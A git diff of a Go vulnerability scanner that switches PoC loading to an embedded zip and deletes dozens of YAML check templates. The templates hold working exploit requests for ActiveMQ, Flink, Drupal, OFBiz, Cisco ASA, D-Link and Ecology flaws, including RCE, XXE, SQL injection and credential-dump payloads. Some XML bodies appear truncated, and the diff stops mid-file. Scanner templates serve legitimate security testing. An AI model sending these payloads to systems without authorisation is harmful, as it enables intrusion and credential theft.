diff --git a/WebScan/lib/http.pb.go b/WebScan/lib/http.pb.go index 1c36c53..51ba410 100644 --- a/WebScan/lib/http.pb.go +++ b/WebScan/lib/http.pb.go @@ -4,10 +4,14 @@ package lib import ( + "bytes" + "archive/zip" "embed" fmt "fmt" proto "github.com/golang/protobuf/proto" "gopkg.in/yaml.v3" + "io/ioutil" + "log" math "math" "strings" ) @@ -393,7 +397,28 @@ func LoadMultiPoc(Pocs embed.FS, pocname string) []*Poc { func loadPoc(fileName string, Pocs embed.FS) (*Poc, error) { p := &Poc{} - yamlFile, err := Pocs.ReadFile("pocs/" + fileName) + + zByte, err := Pocs.ReadFile("pocs/pocs.zip") + zipReader, err := zip.NewReader(bytes.NewReader(zByte), int64(len(zByte))) + if err != nil { + log.Fatal(err) + } + var unzippedFileBytes []byte + // Read all the files from zip archive + for _, zipFile := range zipReader.File { + if zipFile.Name == fileName { + unzippedFileBytes, err = readZipFile(zipFile) + if err != nil { + log.Println(err) + continue + } + break + } + + } + yamlFile := unzippedFileBytes + + //yamlFile, err := Pocs.ReadFile("pocs/" + fileName) if err != nil { return nil, err @@ -406,6 +431,23 @@ func loadPoc(fileName string, Pocs embed.FS) (*Poc, error) { } func SelectPoc(Pocs embed.FS, pocname string) []string { + + + zByte, err := Pocs.ReadFile("pocs/pocs.zip") + zipReader, err := zip.NewReader(bytes.NewReader(zByte), int64(len(zByte))) + if err != nil { + log.Fatal(err) + } + var foundFiles []string + // Read all the files from zip archive + for _, entry := range zipReader.File { + if strings.Contains(entry.Name, pocname){ + foundFiles = append(foundFiles, entry.Name) + } + + } + + /* entries, err := Pocs.ReadDir("pocs") if err != nil { fmt.Println(err) @@ -416,5 +458,18 @@ func SelectPoc(Pocs embed.FS, pocname string) []string { foundFiles = append(foundFiles, entry.Name()) } } + + */ return foundFiles } + + + +func readZipFile(zf *zip.File) ([]byte, error) { + f, err := zf.Open() + if err != nil { + return nil, err + } + defer f.Close() + return ioutil.ReadAll(f) +} \ No newline at end of file diff --git a/WebScan/pocs/activemq-cve-2016-3088.yml b/WebScan/pocs/activemq-cve-2016-3088.yml deleted file mode 100644 index 7b93f13..0000000 --- a/WebScan/pocs/activemq-cve-2016-3088.yml +++ /dev/null @@ -1,34 +0,0 @@ -name: poc-yaml-activemq-cve-2016-3088 -set: - filename: randomLowercase(6) - fileContent: randomLowercase(6) -rules: - - method: PUT - path: /fileserver/{{filename}}.txt - body: | - {{fileContent}} - expression: | - response.status == 204 - - method: GET - path: /admin/test/index.jsp - search: | - activemq.home=(?P.*?), - follow_redirects: false - expression: | - response.status == 200 - - method: MOVE - path: /fileserver/{{filename}}.txt - headers: - Destination: "file://{{home}}/webapps/api/{{filename}}.jsp" - follow_redirects: false - expression: | - response.status == 204 - - method: GET - path: /api/{{filename}}.jsp - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(bytes(fileContent)) -detail: - author: j4ckzh0u(https://github.com/j4ckzh0u) - links: - - https://github.com/vulhub/vulhub/tree/master/activemq/CVE-2016-3088 diff --git a/WebScan/pocs/activemq-default-password.yml b/WebScan/pocs/activemq-default-password.yml deleted file mode 100644 index d9a7ef9..0000000 --- a/WebScan/pocs/activemq-default-password.yml +++ /dev/null @@ -1,16 +0,0 @@ -name: poc-yaml-activemq-default-password -rules: - - method: GET - path: /admin/ - expression: | - response.status == 401 && response.body.bcontains(b"Unauthorized") - - method: GET - path: /admin/ - headers: - Authorization: Basic YWRtaW46YWRtaW4= - expression: | - response.status == 200 && response.body.bcontains(b"Welcome to the Apache ActiveMQ Console of") && response.body.bcontains(b"

Broker

") -detail: - author: pa55w0rd(www.pa55w0rd.online/) - links: - - https://blog.csdn.net/ge00111/article/details/72765210 \ No newline at end of file diff --git a/WebScan/pocs/alibaba-canal-info-leak.yml b/WebScan/pocs/alibaba-canal-info-leak.yml deleted file mode 100644 index a51de57..0000000 --- a/WebScan/pocs/alibaba-canal-info-leak.yml +++ /dev/null @@ -1,12 +0,0 @@ -name: poc-yaml-alibaba-canal-info-leak -rules: - - method: GET - path: /api/v1/canal/config/1/1 - follow_redirects: false - expression: | - response.status == 200 && response.content_type.icontains("application/json") && response.body.bcontains(b"ncanal.aliyun.accessKey") && response.body.bcontains(b"ncanal.aliyun.secretKey") -detail: - author: Aquilao(https://github.com/Aquilao) - info: alibaba Canal info leak - links: - - https://my.oschina.net/u/4581879/blog/4753320 \ No newline at end of file diff --git a/WebScan/pocs/alibaba-nacos-api-unauth.yml b/WebScan/pocs/alibaba-nacos-api-unauth.yml deleted file mode 100644 index 52512fb..0000000 --- a/WebScan/pocs/alibaba-nacos-api-unauth.yml +++ /dev/null @@ -1,15 +0,0 @@ -name: poc-yaml-alibaba-nacos-api-unauth -rules: - - method: GET - path: /nacos/v1/auth/users?pageNo=1&pageSize=9 - headers: - User-Agent: Nacos-Server - follow_redirects: true - expression: | - response.content_type.contains("application/json") && response.body.bcontains(bytes("totalCount")) && response.body.bcontains(bytes("pagesAvailable")) && response.body.bcontains(bytes("username")) && response.body.bcontains(bytes("password")) -detail: - author: AgeloVito - info: alibaba-nacos-api-unauth - login: nacos/nacos - links: - - https://blog.csdn.net/caiqiiqi/article/details/112005424 diff --git a/WebScan/pocs/alibaba-nacos.yml b/WebScan/pocs/alibaba-nacos.yml deleted file mode 100644 index 34a4407..0000000 --- a/WebScan/pocs/alibaba-nacos.yml +++ /dev/null @@ -1,13 +0,0 @@ -name: poc-yaml-alibaba-nacos -rules: - - method: GET - path: /nacos/ - follow_redirects: true - expression: | - response.body.bcontains(bytes("Nacos")) -detail: - author: AgeloVito - info: alibaba-nacos - login: nacos/nacos - links: - - https://blog.csdn.net/caiqiiqi/article/details/112005424 diff --git a/WebScan/pocs/apache-flink-upload-rce.yml b/WebScan/pocs/apache-flink-upload-rce.yml deleted file mode 100644 index 6be7ca6..0000000 --- a/WebScan/pocs/apache-flink-upload-rce.yml +++ /dev/null @@ -1,38 +0,0 @@ -name: poc-yaml-apache-flink-upload-rce -set: - r1: randomLowercase(8) - r2: randomLowercase(4) -rules: - - method: GET - path: /jars - follow_redirects: true - expression: > - response.status == 200 && response.content_type.contains("json") && - response.body.bcontains(b"address") && response.body.bcontains(b"files") - - method: POST - path: /jars/upload - headers: - Content-Type: multipart/form-data;boundary=8ce4b16b22b58894aa86c421e8759df3 - body: |- - --8ce4b16b22b58894aa86c421e8759df3 - Content-Disposition: form-data; name="jarfile";filename="{{r2}}.jar" - Content-Type:application/octet-stream - - {{r1}} - --8ce4b16b22b58894aa86c421e8759df3-- - - follow_redirects: true - expression: > - response.status == 200 && response.content_type.contains("json") && - response.body.bcontains(b"success") && response.body.bcontains(bytes(r2)) - search: >- - (?P([a-zA-Z0-9]{8}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{12}_[a-z]{4}.jar)) - - method: DELETE - path: '/jars/{{filen}}' - follow_redirects: true - expression: | - response.status == 200 -detail: - author: timwhite - links: - - https://github.com/LandGrey/flink-unauth-rce diff --git a/WebScan/pocs/apache-ofbiz-cve-2020-9496-xml-deserialization.yml b/WebScan/pocs/apache-ofbiz-cve-2020-9496-xml-deserialization.yml deleted file mode 100644 index c6ca0a9..0000000 --- a/WebScan/pocs/apache-ofbiz-cve-2020-9496-xml-deserialization.yml +++ /dev/null @@ -1,19 +0,0 @@ -name: poc-yaml-apache-ofbiz-cve-2020-9496-xml-deserialization -set: - rand: randomInt(200000000, 210000000) -rules: - - method: POST - path: /webtools/control/xmlrpc - headers: - Content-Type: application/xml - body: >- - {{rand}}dwisiswant0 - follow_redirects: false - expression: > - response.status == 200 && response.body.bcontains(bytes("methodResponse")) && response.body.bcontains(bytes("No such service [" + string(rand))) -detail: - author: su(https://suzzz112113.github.io/#blog) - links: - - https://lists.apache.org/thread.html/r84ccbfc67bfddd35dced494a1f1cba504f49ac60a2a2ae903c5492c3%40%3Cdev.ofbiz.apache.org%3E - - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/apache_ofbiz_deserialiation.rb diff --git a/WebScan/pocs/apache-solr-file-read.yml b/WebScan/pocs/apache-solr-file-read.yml deleted file mode 100644 index d1f6648..0000000 --- a/WebScan/pocs/apache-solr-file-read.yml +++ /dev/null @@ -1,21 +0,0 @@ -name: poc-yaml-apache-solr-file-read -rules: - - method: GET - path: "/solr/admin/cores?indexInfo=false&wt=json" - search: | - "name":"(?P.+?)", - expression: - response.status == 200 - - method: POST - path: "/solr/{{core_name}}/config" - headers: - Content-type: application/json - body: | - {"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}} - expression: | - response.status == 200 && response.body.bcontains(b"This") -detail: - author: flyinbed - links: - - "https://mp.weixin.qq.com/s/iX2OasjynZ0MAvNTvIcmjg" - - "https://mp.weixin.qq.com/s/HMtAz6_unM1PrjfAzfwCUQ" \ No newline at end of file diff --git a/WebScan/pocs/apacheofbiz-cve-2018-8033-xxe.yml b/WebScan/pocs/apacheofbiz-cve-2018-8033-xxe.yml deleted file mode 100644 index 51a6e22..0000000 --- a/WebScan/pocs/apacheofbiz-cve-2018-8033-xxe.yml +++ /dev/null @@ -1,15 +0,0 @@ -name: poc-yaml-apacheofbiz-cve-2018-8033-xxe -rules: - - method: POST - path: /webtools/control/xmlrpc - headers: - Content-Type: application/xml - body: >- - ]>&disclose; - follow_redirects: false - expression: > - response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) && response.content_type.contains("text/xml") -detail: - author: su(https://suzzz112113.github.io/#blog) - links: - - https://github.com/jamieparfet/Apache-OFBiz-XXE/blob/master/exploit.py \ No newline at end of file diff --git a/WebScan/pocs/bt742-pma-unauthorized-access.yml b/WebScan/pocs/bt742-pma-unauthorized-access.yml deleted file mode 100644 index 5292fe8..0000000 --- a/WebScan/pocs/bt742-pma-unauthorized-access.yml +++ /dev/null @@ -1,11 +0,0 @@ -name: poc-yaml-bt742-pma-unauthorized-access -rules: - - method: GET - path: /pma/ - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(b"information_schema") && response.body.bcontains(b"phpMyAdmin") && response.body.bcontains(b"server_sql.php") -detail: - author: Facker007(https://github.com/Facker007) - links: - - https://mp.weixin.qq.com/s/KgAaFRKarMdycYzETyKS8A diff --git a/WebScan/pocs/cisco-cve-2020-3452-readfile.yml b/WebScan/pocs/cisco-cve-2020-3452-readfile.yml deleted file mode 100644 index 0f4634b..0000000 --- a/WebScan/pocs/cisco-cve-2020-3452-readfile.yml +++ /dev/null @@ -1,11 +0,0 @@ -name: poc-yaml-cisco-cve-2020-3452-readfile -rules: - - method: GET - path: /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua - follow_redirects: false - expression: response.status == 200 && response.headers["Content-Type"] == "application/octet-stream" && response.body.bcontains(b"INTERNAL_PASSWORD_ENABLED") -detail: - author: JrD (https://github.com/JrDw0/) - links: - - https://nvd.nist.gov/vuln/detail/CVE-2020-3452 - - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86 diff --git a/WebScan/pocs/coremail-cnvd-2019-16798.yml b/WebScan/pocs/coremail-cnvd-2019-16798.yml deleted file mode 100644 index 097f5fa..0000000 --- a/WebScan/pocs/coremail-cnvd-2019-16798.yml +++ /dev/null @@ -1,12 +0,0 @@ -name: poc-yaml-coremail-cnvd-2019-16798 -rules: - - method: GET - path: >- - /mailsms/s?func=ADMIN:appState&dumpConfig=/ - follow_redirects: false - expression: > - response.status == 200 && response.body.bcontains(bytes("")) -detail: - author: cc_ci(https://github.com/cc8ci) - links: - - https://www.secpulse.com/archives/107611.html \ No newline at end of file diff --git a/WebScan/pocs/discuz-ml3x-cnvd-2019-22239.yml b/WebScan/pocs/discuz-ml3x-cnvd-2019-22239.yml deleted file mode 100644 index 4445bce..0000000 --- a/WebScan/pocs/discuz-ml3x-cnvd-2019-22239.yml +++ /dev/null @@ -1,22 +0,0 @@ -name: poc-yaml-discuz-ml3x-cnvd-2019-22239 -set: - r1: randomInt(800000000, 1000000000) -rules: - - method: GET - path: /forum.php - follow_redirects: false - expression: | - response.status == 200 - search: cookiepre = '(?P[\w_]+)' - - method: GET - path: /forum.php - headers: - Cookie: "{{token}}language=sc'.print(md5({{r1}})).'" - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(bytes(md5(string(r1)))) -detail: - author: X.Yang - Discuz_version: Discuz!ML 3.x - links: - - https://www.cnvd.org.cn/flaw/show/CNVD-2019-22239 diff --git a/WebScan/pocs/dlink-cve-2019-17506.yml b/WebScan/pocs/dlink-cve-2019-17506.yml deleted file mode 100644 index 87cdc7d..0000000 --- a/WebScan/pocs/dlink-cve-2019-17506.yml +++ /dev/null @@ -1,14 +0,0 @@ -name: poc-yaml-dlink-cve-2019-17506 -rules: - - method: POST - path: /getcfg.php - headers: - Content-Type: application/x-www-form-urlencoded - body: SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a - follow_redirects: false - expression: > - response.status == 200 && response.body.bcontains(b"") && response.body.bcontains(b"") -detail: - author: l1nk3r,Huasir(https://github.com/dahua966/) - links: - - https://xz.aliyun.com/t/6453 diff --git a/WebScan/pocs/dlink-cve-2020-25078-account-disclosure.yml b/WebScan/pocs/dlink-cve-2020-25078-account-disclosure.yml deleted file mode 100644 index 7fa21e7..0000000 --- a/WebScan/pocs/dlink-cve-2020-25078-account-disclosure.yml +++ /dev/null @@ -1,12 +0,0 @@ -name: poc-yaml-dlink-cve-2020-25078-account-disclosure -rules: - - method: GET - path: >- - /config/getuser?index=0 - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(b"name=admin") && response.body.bcontains(b"pass=") && response.headers["Content-Type"].contains("text/plain") -detail: - author: kzaopa(https://github.com/kzaopa) - links: - - https://mp.weixin.qq.com/s/b7jyA5sylkDNauQbwZKvBg \ No newline at end of file diff --git a/WebScan/pocs/dlink-cve-2020-9376-dump-credentials.yml b/WebScan/pocs/dlink-cve-2020-9376-dump-credentials.yml deleted file mode 100644 index fcbcf31..0000000 --- a/WebScan/pocs/dlink-cve-2020-9376-dump-credentials.yml +++ /dev/null @@ -1,15 +0,0 @@ -name: poc-yaml-dlink-cve-2020-9376-dump-credentials -rules: - - method: POST - path: /getcfg.php - headers: - Content-Type: application/x-www-form-urlencoded - body: >- - SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1 - expression: > - response.status == 200 && response.body.bcontains(b"Admin") && response.body.bcontains(b"") && response.body.bcontains(b"") -detail: - author: x1n9Qi8 - Affected Version: "Dlink DIR-610" - links: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9376 \ No newline at end of file diff --git a/WebScan/pocs/dlink-dcs-info-leak.yml b/WebScan/pocs/dlink-dcs-info-leak.yml deleted file mode 100644 index 746ff9f..0000000 --- a/WebScan/pocs/dlink-dcs-info-leak.yml +++ /dev/null @@ -1,9 +0,0 @@ -name: poc-yaml-dlink-dcs-info-leak -rules: - - method: GET - path: /config/getuser?index=0 - expression: response.status == 200 && response.body.bcontains(b"name=") && response.body.bcontains(b"pass=") && response.body.bcontains(b"priv=") -detail: - author: jingling(https://github.com/shmilylty) - links: - - https://mp.weixin.qq.com/s/cG868wc7dmwxFslcwlgDpw \ No newline at end of file diff --git a/WebScan/pocs/docker-api-unauthorized-rce.yml b/WebScan/pocs/docker-api-unauthorized-rce.yml deleted file mode 100644 index 2ddd55a..0000000 --- a/WebScan/pocs/docker-api-unauthorized-rce.yml +++ /dev/null @@ -1,12 +0,0 @@ -name: poc-yaml-docker-api-unauthorized-rce -rules: - - method: GET - path: /info - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(b"KernelVersion") && response.body.bcontains(b"RegistryConfig") && response.body.bcontains(b"DockerRootDir") - -detail: - author: j4ckzh0u(https://github.com/j4ckzh0u) - links: - - https://github.com/vulhub/vulhub/tree/master/docker/unauthorized-rce diff --git a/WebScan/pocs/docker-registry-api-unauth.yml b/WebScan/pocs/docker-registry-api-unauth.yml deleted file mode 100644 index 8b7f36d..0000000 --- a/WebScan/pocs/docker-registry-api-unauth.yml +++ /dev/null @@ -1,16 +0,0 @@ -name: poc-yaml-docker-registry-api-unauth -rules: - - method: GET - path: /v2/ - follow_redirects: false - expression: > - response.status == 200 && "docker-distribution-api-version" in response.headers && response.headers["docker-distribution-api-version"].contains("registry/2.0") - - method: GET - path: /v2/_catalog - follow_redirects: false - expression: > - response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(b"repositories") -detail: - author: p0wd3r - links: - - http://www.polaris-lab.com/index.php/archives/253/ diff --git a/WebScan/pocs/druid-monitor-unauth.yml b/WebScan/pocs/druid-monitor-unauth.yml deleted file mode 100644 index 15d2adb..0000000 --- a/WebScan/pocs/druid-monitor-unauth.yml +++ /dev/null @@ -1,10 +0,0 @@ -name: poc-yaml-druid-monitor-unauth -rules: - - method: GET - path: /druid/index.html - expression: | - response.status == 200 && response.body.bcontains(b"Druid Stat Index") && response.body.bcontains(b"DruidVersion") && response.body.bcontains(b"DruidDrivers") -detail: - author: met7or - links: - - https://github.com/alibaba/druid diff --git a/WebScan/pocs/drupal-cve-2014-3704-sqli.yml b/WebScan/pocs/drupal-cve-2014-3704-sqli.yml deleted file mode 100644 index 87d6939..0000000 --- a/WebScan/pocs/drupal-cve-2014-3704-sqli.yml +++ /dev/null @@ -1,14 +0,0 @@ -name: poc-yaml-drupal-cve-2014-3704-sqli -rules: - - method: POST - path: /?q=node&destination=node - body: >- - pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or - updatexml(0x23,concat(1,md5(666)),1)%23]=bob&name[0]=a - follow_redirects: false - expression: | - response.status == 500 && response.body.bcontains(b"PDOException") && response.body.bcontains(b"fae0b27c451c728867a567e8c1bb4e53") -detail: - Affected Version: "Drupal < 7.32" - links: - - https://github.com/vulhub/vulhub/tree/master/drupal/CVE-2014-3704 \ No newline at end of file diff --git a/WebScan/pocs/drupal-cve-2018-7600-rce.yml b/WebScan/pocs/drupal-cve-2018-7600-rce.yml deleted file mode 100644 index 22cdad0..0000000 --- a/WebScan/pocs/drupal-cve-2018-7600-rce.yml +++ /dev/null @@ -1,19 +0,0 @@ -name: poc-yaml-drupal-cve-2018-7600-rce -set: - r1: randomLowercase(4) - r2: randomLowercase(4) -rules: - - method: POST - path: "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax" - headers: - Content-Type: application/x-www-form-urlencoded - body: | - form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=printf&mail[#type]=markup&mail[#markup]={{r1}}%25%25{{r2}} - expression: | - response.body.bcontains(bytes(r1 + "%" + r2)) -detail: - links: - - https://github.com/dreadlocked/Drupalgeddon2 - - https://paper.seebug.org/567/ -test: - target: http://cve-2018-7600-8-x.vulnet:8080/ diff --git a/WebScan/pocs/drupal-cve-2018-7600-rce2.yml b/WebScan/pocs/drupal-cve-2018-7600-rce2.yml deleted file mode 100644 index 9e723bb..0000000 --- a/WebScan/pocs/drupal-cve-2018-7600-rce2.yml +++ /dev/null @@ -1,29 +0,0 @@ -name: poc-yaml-drupal-cve-2018-7600-rce -set: - r1: randomLowercase(4) - r2: randomLowercase(4) -rules: - - method: POST - path: "/?q=user/password&name[%23post_render][]=printf&name[%23type]=markup&name[%23markup]={{r1}}%25%25{{r2}}" - headers: - Content-Type: application/x-www-form-urlencoded - body: | - form_id=user_pass&_triggering_element_name=name&_triggering_element_value=&opz=E-mail+new+Password - search: | - name="form_build_id"\s+value="(?P.+?)" - expression: | - response.status == 200 - - method: POST - path: "/?q=file%2Fajax%2Fname%2F%23value%2F{{build_id}}" - headers: - Content-Type: application/x-www-form-urlencoded - body: | - form_build_id={{build_id}} - expression: | - response.body.bcontains(bytes(r1 + "%" + r2)) -detail: - links: - - https://github.com/dreadlocked/Drupalgeddon2 - - https://paper.seebug.org/567/ -test: - target: http://cve-2018-7600-8-x.vulnet:8080/ diff --git a/WebScan/pocs/drupal-cve-2019-6340.yml b/WebScan/pocs/drupal-cve-2019-6340.yml deleted file mode 100644 index 178a62b..0000000 --- a/WebScan/pocs/drupal-cve-2019-6340.yml +++ /dev/null @@ -1,33 +0,0 @@ -name: poc-yaml-drupal-cve-2019-6340 -set: - host: request.url.host - r1: randomLowercase(4) - r2: randomLowercase(4) -rules: - - method: POST - path: /node/?_format=hal_json - headers: - Content-Type: application/hal+json - Accept: '*/*' - body: | - { - "link": [ - { - "value": "link", - "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:10:\"{{r1}}%%{{r2}}\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"printf\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}" - } - ], - "_links": { - "type": { - "href": "http://{{host}}/rest/type/shortcut/default" - } - } - } - follow_redirects: true - expression: | - response.status == 403 && response.body.bcontains(bytes(r1 + "%" + r2)) -detail: - author: thatqier - links: - - https://github.com/jas502n/CVE-2019-6340 - - https://github.com/knqyf263/CVE-2019-6340 \ No newline at end of file diff --git a/WebScan/pocs/drupal-drupal7geddon2-rce.yml b/WebScan/pocs/drupal-drupal7geddon2-rce.yml deleted file mode 100644 index d9897e4..0000000 --- a/WebScan/pocs/drupal-drupal7geddon2-rce.yml +++ /dev/null @@ -1,28 +0,0 @@ -name: poc-yaml-drupal-drupalgeddon2-rce # nolint[:namematch] -set: - r1: randomLowercase(4) - r2: randomLowercase(4) -rules: - - method: POST - path: "/?q=user/password&name[%23post_render][]=printf&name[%23type]=markup&name[%23markup]={{r1}}%25%25{{r2}}" - headers: - Content-Type: application/x-www-form-urlencoded - body: | - form_id=user_pass&_triggering_element_name=name&_triggering_element_value=&opz=E-mail+new+Password - search: | - name="form_build_id"\s+value="(?P.+?)" - expression: | - response.status == 200 - - method: POST - path: "/?q=file%2Fajax%2Fname%2F%23value%2F{{build_id}}" - headers: - Content-Type: application/x-www-form-urlencoded - body: | - form_build_id={{build_id}} - expression: | - response.body.bcontains(bytes(r1 + "%" + r2)) -detail: - drupal_version: 7 - links: - - https://github.com/dreadlocked/Drupalgeddon2 - - https://paper.seebug.org/567/ diff --git a/WebScan/pocs/drupal-drupal8geddon2-rce.yml b/WebScan/pocs/drupal-drupal8geddon2-rce.yml deleted file mode 100644 index d8f6192..0000000 --- a/WebScan/pocs/drupal-drupal8geddon2-rce.yml +++ /dev/null @@ -1,20 +0,0 @@ -name: poc-yaml-drupal-drupalgeddon2-rce # nolint[:namematch] -set: - r1: randomLowercase(4) - r2: randomLowercase(4) -rules: - - method: POST - path: "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax" - headers: - Content-Type: application/x-www-form-urlencoded - body: | - form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=printf&mail[#type]=markup&mail[#markup]={{r1}}%25%25{{r2}} - expression: | - response.body.bcontains(bytes(r1 + "%" + r2)) -detail: - drupal_version: 8 - links: - - https://github.com/dreadlocked/Drupalgeddon2 - - https://paper.seebug.org/567/ -test: - target: http://cve-2018-7600-8-x.vulnet:8080/ diff --git a/WebScan/pocs/ecology-sqli.yml b/WebScan/pocs/ecology-sqli.yml deleted file mode 100644 index 3a732d1..0000000 --- a/WebScan/pocs/ecology-sqli.yml +++ /dev/null @@ -1,13 +0,0 @@ -name: poc-yaml-ecology-sqli -set: - rand: randomInt(200000000, 210000000) -rules: - - method: GET - path: /js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20md5({{rand}})%20as%20id%20from%20HrmResourceManager - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(bytes(md5(string(rand)))) -detail: - author: whami-root(https://github.com/whami-root) - links: - - https://github.com/whami-root \ No newline at end of file diff --git a/WebScan/pocs/ecology-validate-sqli.yml b/WebScan/pocs/ecology-validate-sqli.yml deleted file mode 100644 index 52d4c88..0000000 --- a/WebScan/pocs/ecology-validate-sqli.yml +++ /dev/null @@ -1,17 +0,0 @@ -name: poc-yaml-ecology-validate-sqli -set: - r1: randomInt(8000, 9999) - r2: randomInt(800, 1000) -rules: - - method: POST - path: /cpt/manage/validate.jsp?sourcestring=validateNum - body: >- - sourcestring=validateNum&capitalid=11%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0dunion+select+str({{r1}}*{{r2}})&capitalnum=-10 - follow_redirects: true - expression: | - response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) -detail: - author: fuping - links: - - https://news.ssssafe.com/archives/3325 - - https://www.weaver.com.cn/cs/securityDownload.asp \ No newline at end of file diff --git a/WebScan/pocs/ecology-workflowservicexml-2.yml b/WebScan/pocs/ecology-workflowservicexml-2.yml deleted file mode 100644 index 46d2ace..0000000 --- a/WebScan/pocs/ecology-workflowservicexml-2.yml +++ /dev/null @@ -1,20 +0,0 @@ -name: poc-yaml-ecology-workflowservicexml -set: - rand1: randomInt(1000, 9999) - rand2: randomInt(1000, 9999) -rules: - - method: POST - path: 